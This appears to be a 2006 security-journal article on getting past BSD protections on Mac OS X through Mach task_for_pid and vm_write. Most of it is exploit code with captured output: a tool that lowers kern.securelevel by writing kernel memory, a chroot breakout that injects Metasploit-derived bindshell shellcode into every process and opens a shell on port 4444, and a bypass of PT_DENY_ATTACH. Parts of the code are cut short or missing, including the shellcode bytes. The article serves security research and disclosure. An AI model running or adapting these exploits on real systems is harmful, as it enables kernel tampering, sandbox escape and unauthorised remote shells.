Uninformed: Informative Information for the Uninformed

Vol 4» 2006.Jun

Security considerations of a UNIX / Mach hybrid

Many problems arise when both UNIX and Mach aspects are provided on the same system. As the quote from the Apple Security page [2] says (mentioned in the introduction). A good Mach programmer will be able to bypass high level BSD security functionality by using the Mach API/Mach Traps on Mac OS X.

In this section I will run through a couple of examples of situations where BSD security can be bypassed. There are many more cases like this. I'll leave it up to you (the reader) to find more.

The first bypass which we will look at is the "kern.securelevel" sysctl. This sysctl is used to restrict various functionality from the root user. When this sysctl is set to -1, the restrictions are non-existent. Under normal circumstances the root user should be able to raise the securelevel however lowering the securelevel should be restricted.

Here is a demonstration of this:

	-[root@fry:~]$ id
	uid=0(root) gid=0(wheel) 

	-[root@fry:~]$ sysctl -a | grep securelevel
	kern.securelevel = 1

	-[root@fry:~]$ sysctl -w kern.securelevel=-1
	kern.securelevel: Operation not permitted

	-[root@fry:~]$ sysctl -w kern.securelevel=2
	kern.securelevel: 1 -> 2

	-[root@fry:~]$ sysctl -w kern.securelevel=1
	kern.securelevel: Operation not permitted

As you can see, modification of this sysctl works as described above. However! Due to the fact that we can task_for_pid() pid=0 and write to kernel memory, we can bypass this.

In order to do this, we simply get the address of the variable in kernel- space which stores the securelevel. To do this we can use the `nm' tool.

	-[root@fry:~]$ nm /mach_kernel | grep securelevel
	004bcf00 S _securelevel

We can then use this value by calling task_for_pid() to get the kernel task port, and calling vm_write() to write to this address. The code below does this.

Here is an example of this code being used.

	-[root@fry:~]$ sysctl -a | grep securelevel
	kern.securelevel = 1

	-[root@fry:~]$ ./slevel -1
	[+] done!

	-[root@fry:~]$ sysctl -a | grep securelevel
	kern.securelevel = -1

A kext could also be used for this. But this is neater and relevant.

 * [ slevel.c ]
 * nemo@felinemenace.org 
 * 2006
 * Tools to set the securelevel on
 * Mac OSX Build 8I1119 (10.4.6 intel).

#include <mach/mach.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

// -[nemo@fry:~]$ nm /mach_kernel | grep securelevel
// 004bcf00 S _securelevel
#define  SECURELEVELADDR 0x004bcf00

void error(char *msg)
        printf("[!] error: %s\n",msg);

void usage(char *progname)
        printf("[+] usage: %s <value>\n",progname);

int main(int ac, char **av)
        mach_port_t    kernel_task;
        kern_return_t  err;
        long           value = 0;

        if(ac != 2)

        if(getuid() && geteuid())
                error("requires root.");

        value = atoi(av[1]);

        err = task_for_pid(mach_task_self(),0,&kernel_task);
        if ((err != KERN_SUCCESS) || !MACH_PORT_VALID(kernel_task))
                error("getting kernel task.");

        // Write values to stack.
        if(vm_write(kernel_task, (vm_address_t) SECURELEVELADDR, (vm_address_t)&value, sizeof(value)))
                error("writing argument to dlopen.");

        printf("[+] done!\n");
        return 0;

The chroot() call is a UNIX mechanism which is often (mis)used for security purposes. This can also be bypassed using the Mach API/functionality. A process running on Mac OSX within a chroot() is able to attach to any process outside using the task_for_pid() Mach trap. Although neither of these problems are significant, they are an indication of some of the ways that UNIX functionality can be bypassed using the Mach API.

The code below simply loops through all pids from 1 upwards and attempts to inject a small code stub into a new thread. It is written for PowerPC architecture. I have also included some shellcode for intel arch in case anyone has the need to use it in these circumstances.

 * sample code to break chroot() on osx
 * - nemo
 * This code is a PoC and by so, is pretty harsh
 * I just trap in any process which isn't desirable.
 * DO NOT RUN ON A PRODUCTION BOX (or if you do, email 
 * me the results so I can laugh at you)

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <mach/mach.h>
#include <mach/ppc/thread_status.h>
#include <mach/i386/thread_state.h>
#include <dlfcn.h>

#define STACK_SIZE 0x6000
#define MAXPID	  0x6000 

char ppc_probe[] =
// stat code
// bindshell from metasploit. Port 4444

unsigned char x86_probe[] =  
// stat code, cheq for /mach_kernel. Makes sure we're outside 
// the chroot.
// bindshell - 89 bytes - port 4444  
// based off metasploit freebsd code.

int injectppc(pid_t pid,char *sc,unsigned int size)
        kern_return_t ret;
        mach_port_t mytask;
        vm_address_t stack;
        ppc_thread_state_t ppc_state;
        thread_act_t thread;
        long blr = 0x7fe00008;

        if ((ret = task_for_pid(mach_task_self(), pid, &mytask)))
		return -1;

        // Allocate room for stack and shellcode.
        if(vm_allocate(mytask, &stack, STACK_SIZE, TRUE) != KERN_SUCCESS)
		return -1;

	// Write in our shellcode
        if(vm_write(mytask, (vm_address_t)((stack + 650)&~2), (vm_address_t)sc, size))
		return -1;

        if(vm_write(mytask, (vm_address_t) stack + 960, (vm_address_t)&blr, sizeof(blr)))
		return -1;
	// Just in case.
 	if(vm_protect(mytask,(vm_address_t) stack, STACK_SIZE, 
		return -1;

        ppc_state.srr0  = ((stack + 650)&~2);
        ppc_state.r1    = stack + STACK_SIZE - 100;
        ppc_state.lr    = stack + 960;          // terrible blr cpu usage but this 
						// whole code is a hack so shutup!.

        if(thread_create_running(mytask, PPC_THREAD_STATE,
          (thread_state_t)&ppc_state, PPC_THREAD_STATE_COUNT, &thread)
        != KERN_SUCCESS)
		return -1;

        return 0;

int main(int ac, char **av)
	pid_t pid;
	// (pid = 0) == kernel
	printf("[+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP).\n");
	for(pid = 1; pid <= MAXPID ; pid++) 

	return 0;

The output below shows a sample run of this code on a stock standard Mac OSX 10.4.6 Mac mini. As you can see, a non privilege user within the chroot() is able to attach to a process running at the same privilege level outside of the chroot(). Some shellcode can then be injected into the process to bind a shell.

	-[nemo@gir:~/code]$ gcc break.c -o break
	-[nemo@gir:~/code]$ cp break chroot/
	-[nemo@gir:~/code]$ sudo chroot chroot/
	-[root@gir:/]$ ./dropprivs

An interesting note about this little ./dropprivs program is that I had to use seteuid()/setuid() separately rather than using the setreuid() function. It appears setreuid() and setregid() don't actually work at all. Andrewg summed this situation up nicely:

<andrewg> best backdoor ever

	-[nemo@gir:/]$ ./break 
	[+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP).
	-[nemo@gir:/]$ Illegal instruction
	-[root@gir:/]$ nc localhost 4444
	ls -lsa /mach_kernel
	8472 -rw-r--r--   1 root  wheel  4334508 Mar 27 14:27 /mach_kernel
	uid=501(nemo) gid=501(nemo) groups=501(nemo)

Another method of breaking out from a chroot() environment would be to simply task_for_pid() pid 0 and write into kernel memory. However since this would require root privileges I didn't bother to implement it. This code could quite easily be implemented as shellcode. However, due to time constraints and lack of caring, I'll leave it up to you to do so.


As I mentioned in the ptrace section of this paper, the ptrace() syscall has been heavily bastardized and is pretty useless now. However, a new ptrace command PT_DENY_ATTACH has been implemented to enable a process to request that other processes will not be able to ptrace attach to it.

The following sample code shows the use of this:

	#include <stdio.h>
	#include <sys/types.h>
	#include <sys/ptrace.h>

	static int changeme =  0;

	int main(int ac, char **av)

		ptrace(PT_DENY_ATTACH, 0, 0, 0);

		while(1) {
			if(changeme) {
				printf("[+] hacked.\n");

		return 1;       

This code does nothing but sit and spin while checking the status of a global variable which is never changed. As you can see below, if we try to attach to this process in gdb (which uses ptrace) our process will receive a SIGSEGV.

	(gdb) at hackme.25143 
	A program is being debugged already.  Kill it? (y or n) y
	Attaching to program: `/Users/nemo/hackme', process 25143.
	Segmentation fault

However we can use the Mach API, as mentioned earlier, and still attach to the process just fine. We can use the `nm' command in order to get the address of the static changeme variable.

	-[nemo@fry:~]$ nm hackme | grep changeme
	0000202c b _changeme

Then, using the following code, we task_for_pid() the process and modify the contents of this variable (as an example.)

	#include <stdio.h>
	#include <stdlib.h>
	#include <unistd.h>
	#include <sys/types.h>
	#include <sys/mman.h>
	#include <mach/mach.h>
	#include <dlfcn.h>

	#define CHANGEMEADDR 0x202c

	void error(char *msg)
		printf("[!] error: %s\n",msg);

	int main(int ac, char **av)
		mach_port_t port;
		long    content = 1;

		if(ac != 2) {
			printf("[+] usage: %s <pid>\n",av[0]);

		if(task_for_pid(mach_task_self(), atoi(av[1]), &port))

		if(vm_write(port, (vm_address_t) CHANGEMEADDR, (vm_address_t)&content, sizeof(content)))
			error("writing to process");

		return 0;

As you can see below, this will result in the loop terminating as expected.

	-[nemo@fry:~]$ ./hackme
	[+] hacked.